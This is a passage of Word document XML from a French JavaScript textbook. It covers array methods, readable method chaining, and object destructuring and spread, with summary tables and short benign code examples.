      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Les méthodes de tableau remplacent la plupart des boucles </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. Elles expriment l'intention : filtrer, transformer, réduire, trier, chercher.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.80 — Neuf méthodes de tableau</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13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Méthode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="377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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="31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Retour</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>map</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3770"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Transforme chaque élément</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3114"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Nouveau tableau de même taille</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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filter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="377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Conserve ceux qui passent un test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="31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Nouveau tableau</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>reduce</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3770"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Agrège en une valeur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3114"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Valeur unique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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find</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="377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Premier élément correspondant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="31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Élément ou </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>undefined</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>some</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>every</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3770"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Au moins un / tous</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3114"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Booléen</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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sort</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="377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Trie en place</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="31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Tableau trié (mutation)</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>toSorted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3770"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Trie sans muter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3114"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Nouveau tableau</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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flat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="377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Aplati un niveau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="31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Nouveau tableau</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>includes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3770"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Contient une valeur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3114"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Booléen</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Six opérations courantes sans une seule boucle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const stagiaires = [</w:t>
        <w:br/>
        <w:t xml:space="preserve">  { nom: "Ada", note: 18, present: true },</w:t>
        <w:br/>
        <w:t xml:space="preserve">  { nom: "Grace", note: 15, present: false },</w:t>
        <w:br/>
        <w:t xml:space="preserve">  { nom: "Linus", note: 12, present: true },</w:t>
        <w:br/>
        <w:t>];</w:t>
        <w:br/>
        <w:br/>
        <w:t>const noms = stagiaires.map(s =&gt; s.nom);</w:t>
        <w:br/>
        <w:t>const admis = stagiaires.filter(s =&gt; s.note &gt;= 15);</w:t>
        <w:br/>
        <w:t>const moyenne = stagiaires.reduce((total, s) =&gt; total + s.note, 0) /</w:t>
        <w:br/>
        <w:t xml:space="preserve">  stagiaires.length;</w:t>
        <w:br/>
        <w:t>const tousPresents = stagiaires.every(s =&gt; s.present);</w:t>
        <w:br/>
        <w:t>const premier = stagiaires.find(s =&gt; s.nom === "Grace");</w:t>
        <w:br/>
        <w:br/>
        <w:t>const tries = stagiaires.toSorted((a, b) =&gt; b.note - a.note);</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`SORT` MODIFIE LE TABLEAU</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>sort</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> trie en place et renvoie le même tableau. Utilisez </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>toSorted</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> pour obtenir une copie, ou </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>[...tableau].sort(...)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> si le support est ancien.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le chaînage </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>filter(...).map(...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est lisible tant qu'il reste court. Au-delà de trois étapes, extrayez des fonctions nommées : le code se lit alors comme une phrase.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un chaînage qui reste lisible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const resultat = commandes</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .filter(c =&gt; c.statut === "payee")</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .flatMap(c =&gt; c.lignes)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .filter(l =&gt; l.quantite &gt; 0)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  .reduce((total, l) =&gt; total + l.prix * l.quantite, 0);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>25.3 Objets et déstructuration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un objet associe des clés à des valeurs. La déstructuration extrait plusieurs valeurs en une ligne, avec des valeurs par défaut et des renommages.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Déstructurer et copier sans muter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const article = {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  titre: "CSS Grid",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  auteur: { nom: "Ada", role: "éditrice" },</w:t>
        <w:br/>
        <w:t xml:space="preserve">  tags: ["css", "mise en page"],</w:t>
        <w:br/>
        <w:t xml:space="preserve">  publie: true,</w:t>
        <w:br/>
        <w:t>};</w:t>
        <w:br/>
        <w:br/>
        <w:t>const { titre, tags, publie = false } = article;</w:t>
        <w:br/>
        <w:t>const { auteur: { nom } } = article;</w:t>
        <w:br/>
        <w:t>const { titre: intitule } = article;</w:t>
        <w:br/>
        <w:br/>
        <w:t>const nouvelArticle = {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ...article,</w:t>
        <w:br/>
        <w:t xml:space="preserve">  tags: [...article.tags, "reference"],   // copie superficielle</w:t>
        <w:br/>
        <w:t xml:space="preserve">  publie: false,</w:t>
        <w:br/>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.81 — Six opérations sur les objets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33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Opération</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="367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Écriture</w:t>
            </w:r>
          </w:p>
        </w:tc>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Remarque</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2337"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Accès</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3672"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>article.titre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3005"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>undefined</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> si absent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2337"/>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Accès sûr</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="367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article?.auteur?.nom</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Chaînage optionnel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2337"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Valeur par défaut</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3672"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>const { x = 1 } = obj</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Seulement si </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>undefined</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2337"/>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Copie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="367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 ...obj }</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Superficielle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2337"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Fusion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3672"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>{ ...a, ...b }</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3005"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>b</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> écrase </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2337"/>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Clé dynamique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="367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 [cle]: valeur }</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Calcul à l'exécution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">25.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
        </w:rPr>
